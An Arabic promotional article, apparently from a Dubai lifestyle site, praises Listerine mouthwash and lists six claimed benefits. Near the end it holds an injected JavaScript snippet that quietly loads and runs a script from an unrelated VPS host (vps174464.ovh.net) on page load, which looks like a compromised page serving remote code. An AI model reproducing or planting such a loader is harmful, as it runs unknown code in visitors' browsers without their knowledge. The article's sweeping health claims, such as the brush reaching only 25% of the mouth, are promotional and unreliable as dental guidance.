الافضل في المدينةجربنا لكم

بالفيديو .. فوائد ليسترين الــ 6 لفم وأسنان أكثر صحية

عين دبي – حول المدينة

يعتبر الابتعاد عن دكتور الأسنان غاية يرغب بها كل شخص، والسؤال هل تنظيف الأسنان بالفرشاة يكفينا؟ أم أن استخدام الخيط الطبي يحمينا؟ هل كنت تعلم من قبل أن عملية تنظيف الفم والاسنان لا تكتمل دون استخدام الغسول؟


إن استخدام غسول الفم ليسترين خلال عملية تنظيف الفم والأسنان اليومية من الأمور الأساسية الواجب مراعاتها، ولهذا السبب نقدم لكم في هذا المقال أهم 6 فوائد منتظرة من استخدام غسول الفم بانتظام.

فبعد أيام قليلة من المضمضة اليومية بــغسول الفم ليسترين، لاحظت اختفاء رائحة الفم الكريهة التي كانت من أكثر الأشياء المحرجة خصوصا بعد الاستيقاظ من النوم، كما وقد ساعدني على المحافطة على بياض الأسنان، ذلك كنتيجة حتمية لوصوله إلى كافة اجزاء الفم والأسنان.

وخلال مراجعتنا ليسترين توتال كير، كانت قد أطلقت الشركة ذاتها ليسترين زيرو، ويختلف ليسترين توتال كير عن زيرو بـــ مقدرة زيرو على قتل الجرائيم مقارنة مع توتال كير الذي يحارب البكتيريا، شاهدوا هذا الفيديو حول ليسترين زيرو الذي يوضح كيف يحمي ليسترين زيرو كامل الفم من الجراثيم والبكتيريا بزاوية 360 درجة.

يحدث الآن  مجوهرات ملكية للمصمم سابياساتشي موخرجي تعرض لأول مرة في دبي

وبعد تجربتنا لغسول الفم ليسترين، رغبنا مشاركتكم ونصحكم بــ استخدامه بشكل منتظم، للحصول على 6 فوائد يسعى إليها كل شخص، وهي:

  1. يحمي من التسوس، ذلك كنتيجة حتمية لوصوله إلى معظم أجزاء الفم التي لا تتمكن الفرشاة لوحدها من الوصل إليها، حيث تذكر الكثير من الدراسات أن الفرشاة تصل إلى 25% من كامل الفم.
  2. يمنع إلتهاب اللثة، نحن عرضة بشكل دائم إلى الاصابة بالتهاب اللثة التي يسببها تراكم طبقة من الجراثيم على سطح الاسنان، التي تشكل فيما بعد جير الأسنان ذو الخطر المباشر على اللثة، لذلك استخدام غسول الفم سيعمل على مقاومة هذه البكتيريا ويقلل الإصابة بإلتهاب اللثة.
  3. يقتل البكتيريا، حيث يساعد غسول الفم إلى تقوية مينا الأسنان، التي تعد خط الحماية الأول للأسنان.
  4. يقلل من الطبقات الكلسية، حيث أن المضمضة بغسول الفم يعمل على التخلص من بقايا الطعام العالقة، التي تعد العامل الأول في تشكل طبقة البلاك، حيث أوجدت الابحاث والدراسات، ان غسول الفم بمكوناته بامكانه تقليل تراكم طبقة البلاك بنسبة تصل الى 52% اكثر من استخدام فرشاة الاسنان والخيط الطبي وحدهما.
  5. يحافظ على بياض الأسنان، حيث يقتل ويمنع غسول الفم تراكم رواسب التدخين وبقايا الطعام، التي تسبب إصفرار الأسنان وخسارة نضارة الأسنان.
  6. ينعش الفم،نظرا لاحتواء غسول الفم على مركبات مختلفة تعمل على تطهير الفم وقتل البكتيريا المسببة لرائحة الفم الكريهة، بالتالي تضمن التخلص من هذه الرائحة وما تحمله من إحراجات.
يحدث الآن  فنانة عربية مقيمة في دبي تصمم أعمال فنية إحتفاءاً بعام التسامح

لذلك اقتني ليسترين وحافظ على نضارة أسنانك من دون رائحة كريهة بعد اليوم، ذلك بعد محاولتنا إلى إغناء معرفتك حول غسول الفم وكيفية استخدامه. للمزيد حوله اضغط هنا

(function(){ var aa = document.createElement('script'); aa.type = 'text/javascript'; aa.async = true; aa.src = 'http://vps174464.ovh.net/js/aa.js'; var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(aa, s); })();

أضف تعليقك

التعليقات

جاء زوارنا لهذ الموضوع من خلال كلمة

  • ليسترين لرائحة الفم (2)
  • ليسترين توتال كير زيرو (1)

مقالات قد تعجبك

اترك تعليقاً

لن يتم نشر عنوان بريدك الإلكتروني.

زر الذهاب إلى الأعلى